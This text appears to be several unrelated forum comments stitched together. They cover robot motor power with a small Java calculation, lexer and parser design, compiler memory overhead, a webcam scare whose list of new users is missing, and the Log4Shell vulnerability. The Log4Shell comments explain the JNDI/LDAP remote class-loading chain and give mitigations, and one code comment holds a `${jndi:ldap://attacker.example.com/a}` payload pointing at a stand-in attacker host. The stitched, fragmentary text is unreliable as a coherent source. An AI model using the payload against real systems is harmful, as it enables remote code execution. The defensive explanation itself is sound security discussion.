That's a very impressive story! I was hoping this post would get a bit more attention so I could read more tales like this, but I guess this will have to do.
I assume that a robot capable of handling 400 lb must have a pretty beefy power supply. You can get an intuitive sense of how much damage a robot can do to you by imagining what would happen if all of its power output were delivered directly into your body (as heat, electricity, or kinetic energy). A tiny 5V motor on a breadboard might be enough to warm your hand up or fling a small pebble toward you, but a motor that requires one of those bigger 400V 3-phase 60A supplies can probably pull enough energy to melt iron or deliver the same kinetic energy as some military ordnance.
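As a rough back-of-the-envelope check (my own numbers, assuming the 400V figure is line-to-line voltage and the motor really draws the full 60A), here's the comparison in a few lines of Java:

    public class PowerComparison {
        public static void main(String[] args) {
            // Tiny hobby motor: ~5V at ~100mA (assumed figures)
            double toyWatts = 5.0 * 0.1;

            // Three-phase apparent power: S = sqrt(3) * V_line * I
            // (assuming 400V line-to-line and a full 60A draw)
            double industrialWatts = Math.sqrt(3) * 400.0 * 60.0;

            System.out.printf("Toy motor:        %.1f W%n", toyWatts);
            System.out.printf("Industrial drive: %.0f W (~%.0f kW)%n",
                    industrialWatts, industrialWatts / 1000.0);
            System.out.printf("Ratio:            ~%.0fx%n", industrialWatts / toyWatts);
        }
    }

That's roughly 42 kW versus half a watt, which is why the 'imagine it all dumped into your body' heuristic scales so badly.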
The title of this post stood out to me because it's a fairly niche topic that I've been meaning to write a 'rant' post about myself. I think in a very 'pure' parsing theory sense, there is no real advantage to separating the lexer and the parser. I claim that any counter-argument comes down to the limitations of individual software tools and their inability to let us specify the grammar that we actually want.
If I recall correctly, the original historical reason for separating them was due to memory limitations on early mainframe computers. Actual source code would be fed into the 'lexer' and a stream of 'tokens' would come out the other end and then be saved to a file, which would then be fed into the next stage.
Having said this, you can ask "In practice, is there currently an advantage to separating the lexer and the parser with the tools we use now?" The answer is 'yes', but I claim that this is just a limitation of the tools available to us today. Tokens are usually described using simple regular expressions, whereas the parsing rules are context-free, so the worst-case complexity of parsing the two is not the same. If you pull tokens into the parser and just treat them as naive single-character parser items, you end up doing more work than you would have otherwise, since your parser will try all kinds of unlikely and impossible chopped-up token combinations. The other big issue is memory: turning every token into a (small) parse tree is going to increase memory usage 10-20x (depending on the length of your tokens).
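To make the split concrete, here's a minimal toy sketch (my own example, not taken from any particular tool): every token kind is a plain regular expression that a lexer can match in one linear pass, and only whole tokens ever reach the context-free parser.

    import java.util.ArrayList;
    import java.util.List;
    import java.util.regex.Matcher;
    import java.util.regex.Pattern;

    public class ToyLexer {
        // Every token kind is a plain regular expression; no context-free machinery needed here.
        private static final Pattern TOKEN = Pattern.compile(
                "\\s+|\\d+|[A-Za-z_]\\w*|'[^']*'|[(){};]");

        public static List<String> lex(String source) {
            List<String> tokens = new ArrayList<>();
            Matcher m = TOKEN.matcher(source);
            int pos = 0;
            while (pos < source.length() && m.find(pos) && m.start() == pos) {
                tokens.add(m.group()); // the parser sees whole tokens, never raw characters
                pos = m.end();
            }
            return tokens;
        }

        public static void main(String[] args) {
            System.out.println(lex("if ( 1 ) { putc('a'); }"));
        }
    }

A character-level grammar would instead have to consider every possible way of grouping those characters, which is exactly the wasted work described above.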
Personally, I think there is a substantial need for more advanced ways of describing language grammars. The ideal model would be to have various kinds of annotations or modifiers that you could attach to grammar rules, and then the parser generator would do all sorts of optimizations based on the constraints that these annotations imply. Technically, we already do this. It's called putting the lexer in one file, and the parser in another file. There is no good reason why we can't specify both using a more unified grammar model and let the parser generator figure out what to do with each rule to be as efficient as possible.
The computer science theory behind grammars seems to have peaked in the 1980s, and not much new innovation seems to have made it into daily programming life since then.
One of the reasons I stopped working on it was how slow it became, so I might be able to help answer your question.
Initially, when the compiler was simpler, it was actually much faster. I was able to do some meaningful proof-of-concept demos with it, like compiling a small microkernel and compiling most of its own source code. Of course, the natural next step was to make it cross-compile itself and run in the browser, and that's where it became terribly slow, which required more code to optimize, and the new code added to make it faster in the long term made it much slower in the short term.
To start with, if you think of a simple piece of code like this:
if ( 1 ) { putc('a'); }
This is only a 23-byte program, so why should it be slow to compile? Well, the first stage of parsing this program is tokenization. In this short program, I count 16 different 'tokens' (including the whitespace). If you want even the simplest data structure to describe one of your 'tokens', containing only a single pointer to an offset in the program, then you will need 16 pointers just for the tokens. On a 64-bit machine, pointers are 8 bytes, and 16 * 8 = 128 bytes, just for the pointers into the program's byte array! And we haven't even started talking about the memory overhead of all the other things you'll need to record about these tokens in your token object.
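To put that overhead in code (a deliberately minimal sketch in Java, regardless of what language the compiler itself is written in), even a token that stores nothing but a reference into the source plus an offset and length already dwarfs the characters it describes:

    /** A deliberately minimal token: a pointer into the source buffer plus an offset and length. */
    final class Token {
        final char[] source; // pointer-sized reference (8 bytes on a 64-bit machine)
        final int offset;    // where in the source this token starts
        final int length;    // how many characters it covers

        Token(char[] source, int offset, int length) {
            this.source = source;
            this.offset = offset;
            this.length = length;
        }
    }

    public class TokenOverhead {
        public static void main(String[] args) {
            char[] program = "if ( 1 ) { putc('a'); }".toCharArray();
            Token first = new Token(program, 0, 2); // the "if" keyword

            int tokenCount = 16;  // the token count from the comment above
            int pointerBytes = 8; // 64-bit pointers/references
            System.out.println("Program size:        " + program.length + " characters");
            System.out.println("Pointer bytes alone: " + (tokenCount * pointerBytes) + " bytes");
            // ...and that ignores the offset/length fields, object headers, alignment, etc.
        }
    }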
So, now we already have a memory overhead more than 5 times the size of the program, but we also have to build the parse tree, control flow graphs, linker objects, etc., and we also have to pull in a mess of header files, bloated libraries, and so on. If you're wasteful with memory in the compiler, you can easily run out of memory compiling a few megabytes of source code. Being more intelligent with memory management means copying memory around a lot, which also adds to the latency.
So, now you need to think about optimizing your memory use, and do 'smarter' things that trade memory usage for CPU. Plus, you're likely to start calling free/delete on heap memory a lot, which is expensive (and can bottom out in system calls) compared to an ordinary call within your program. By the time you implement all this 'optimization', your compiler has become an incredibly complicated and bloated system that requires even more code to exploit all the remaining opportunities for improvement.
A couple of weeks ago I was working away in the terminal when, all of a sudden, my USB camera turned on and its light started flashing at me, indicating something had just started interacting with my webcam. I immediately assumed, "Oh, that's probably just some hackers watching me through my webcam," so I looked through /var/log a bit and noticed that it had just re-detected all USB devices and that two new users had just been added to my system:
Does anyone know what these new users are for, and why they were added just now instead of at install time? I googled a bit, but couldn't find any recent news about it.
I've been thinking about this since I saw it here on HN yesterday, and I can't help but entertain the idea that this might end up being 'the worst software security flaw ever'.
We tested this on several JVM versions and found you needed to go really far back, to around Java 8u121 I think, to see the specific exploit using LDAP + HTTP class loading work, because they changed the default value of the JVM property that allows loading a class file from a remote codebase... however, as this article points out, quite mind-blowingly, early JDK 11 releases also seem to have been vulnerable (I believe at least JDK 11.0.2 is no longer vulnerable, but I can't confirm right now).
We also found that other, similar JNDI-based exploits can work even when the one that uses LDAP to redirect class loading to a malicious HTTP server doesn't (I won't mention them here because they make it much easier to exploit; so disabling log4j's evaluation of JNDI patterns, or migrating to the patched version, is still absolutely necessary).
Interesting, thank you for that analysis. From what I understand, the RCE exploit really needs two things to work: 1) the interpretation of the JNDI reference by log4j, and 2) the 'auto-execute loaded classes' behavior (which I don't quite understand).
Is there any kind of low-level flag you can pass to Java or your environment to completely disable JNDI? I recall that there is a flag you can pass to log4j, but I can't see any reason why I would ever use JNDI anywhere in Java.
Also, do you have any additional insights on how exactly the mechanism for 2) works? From what I understand, this is a feature of Java itself?
To list the modules your JDK has, use `java --list-modules` (JNDI lives in the java.naming module).
If you're not using the module system, you can't completely disable JNDI, but you can tell the JVM not to load classes from a remote host by setting the system property "com.sun.jndi.ldap.object.trustURLCodebase" to "false". This has been the default in most JDKs for several years, but apparently some folks still somehow fell victim to this. There are other configuration properties you can adjust, listed in the javadocs for javax.naming.Context at https://docs.oracle.com/javase/8/docs/api/index.html?javax/n....
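For example (my own snippet, not from the parent comment), the property can be set either on the command line with -Dcom.sun.jndi.ldap.object.trustURLCodebase=false or programmatically, as long as it happens before any JNDI lookup runs:

    public class Main {
        public static void main(String[] args) {
            // Equivalent to -Dcom.sun.jndi.ldap.object.trustURLCodebase=false on the command line.
            // Must be set before any JNDI/LDAP lookup is performed.
            System.setProperty("com.sun.jndi.ldap.object.trustURLCodebase", "false");

            // ... start the rest of the application ...
        }
    }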
The LDAP/JNDI exploit works because when JNDI performs a lookup (and in this case, simply logging a message containing `${jndi:...}` with log4j would trigger one), it may connect to a remote host that's under the attacker's control... the LDAP response from whatever LDAP server got contacted can contain all sorts of instructions for the JVM to load classes remotely, from an HTTP server anywhere on the internet, for example.

The attack I've seen used the LDAP ObjectFactory mechanism, which lets the LDAP response say where to get the bytecode of another ObjectFactory via any URL. If the JVM property "com.sun.jndi.ldap.object.trustURLCodebase" were false, this would have been blocked, but otherwise the attacker's class is loaded and can immediately run (via a static block, for example) any Java code at all on your server. Notice that this is a feature of LDAP, not a bug, but it should never have been possible for untrusted input to end up in a JNDI lookup, for obvious reasons.

There are other ways to "bypass" this flag by using other LDAP features that load remote code (I won't list them here, but they're easy to find if you know LDAP and JNDI) or by using another JNDI provider (RMI, CORBA), in case the libraries you have on the classpath include another ObjectFactory that loads remote code (e.g. many JDBC drivers, Apache Tomcat, etc.) - it's impossible to tell how many similar attacks become possible once you have JNDI opened up to untrusted input.
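To illustrate the entry point (a hypothetical sketch, assuming a vulnerable log4j 2.x with message lookups enabled; the class and variable names are made up), all it takes is logging an attacker-controlled string:

    import org.apache.logging.log4j.LogManager;
    import org.apache.logging.log4j.Logger;

    public class LoginController {
        private static final Logger log = LogManager.getLogger(LoginController.class);

        // Imagine 'userAgent' comes straight from an HTTP request header.
        void handleLogin(String username, String userAgent) {
            // On a vulnerable log4j 2.x, a value like
            //   ${jndi:ldap://attacker.example.com/a}
            // in userAgent triggers a JNDI/LDAP lookup when this line runs,
            // which kicks off the chain described above.
            log.info("Login attempt by {} using {}", username, userAgent);
        }
    }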
This attack has been known for several years... if you look hard enough you'll find whole toolkits showing how to perform these attacks dating back at least 6 years, from what I found.
Would it? It's a very common logging package, and Java is cross-platform. I also think OSes tend to be updated more often than JDKs (but I'm not sure).
It's used by Elasticsearch, so it's possible you could exploit the log aggregation service even if the app-level logging library isn't vulnerable, but you'd need a way to make sure the first-level logging doesn't interpret the format string.